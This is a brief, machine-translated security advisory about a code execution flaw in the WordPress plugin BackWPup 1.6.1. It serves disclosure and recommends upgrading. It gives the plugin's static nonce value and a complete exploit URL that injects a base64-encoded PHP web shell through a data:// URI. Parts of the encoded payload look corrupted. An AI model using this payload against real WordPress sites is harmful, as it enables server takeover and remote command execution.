WordPress plugin BackWPup remote and local code execution vulnerability and fix-vulnerability warning-the black bar safety net

2011-03-31T00:00:00
ID MYHACK58:62201129917
Type myhack58
Reporter 佚名
Modified 2011-03-31T00:00:00

Description

Brief Description: a vulnerability was discovered in the WordPress plugin BackWPup 1.6.1 can be used on web pages to perform local or remote code Server. Input passed to the Assembly“wp_xml_export.php”by “wpabs”variable to allow the inclusion and execution of local or remote PHP file, as long as a“_nonce”value is known. In“_nonce”value Relies on a static constant which is not defined in the script meaning Its default value is“822728c8d9” in.

Detailed description: wp_xml_export. php? _nonce=822728c8d9&wpabs=data://text/plain;base64,PGZ vcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnukvrvuvtvf9vukknxt8%2bIiBtZX Rob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSj0zxh0iibuyw1lpsj4ij48aw5wdxqgdhlwzt0 ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2bPHByZT48PyAKZWNobyBgeyRfUE9TVF sneCddfWA7ID8%2bPC9wcmU%2bPD8gZGllKCk7ID8%2bCgo%3d

Vulnerability proof: the affected version. 1.6.1(verification), there may be other Solution: upgrade to version 1. 7. 1